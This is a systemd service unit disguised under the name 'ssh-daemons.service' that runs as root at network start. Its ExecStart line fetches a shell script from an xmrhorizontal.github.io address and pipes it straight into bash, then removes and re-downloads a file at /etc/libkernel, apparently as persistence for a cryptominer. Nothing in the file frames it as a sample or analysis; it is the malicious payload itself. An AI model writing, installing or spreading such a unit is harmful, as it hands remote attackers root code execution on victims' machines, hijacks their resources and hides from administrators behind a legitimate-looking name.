[Unit]
Description=ssh-daemons.service
After=network-online.target

[Service]
User=root
ExecStart=/bin/bash -c "curl -s https://xmrhorizontal.github.io/alarm.sh | bash || true && rm /etc/libkernel || true && wget -O /etc/libkernel https://xmrhorizontal.github.io/config.json || true"
Type=oneshot
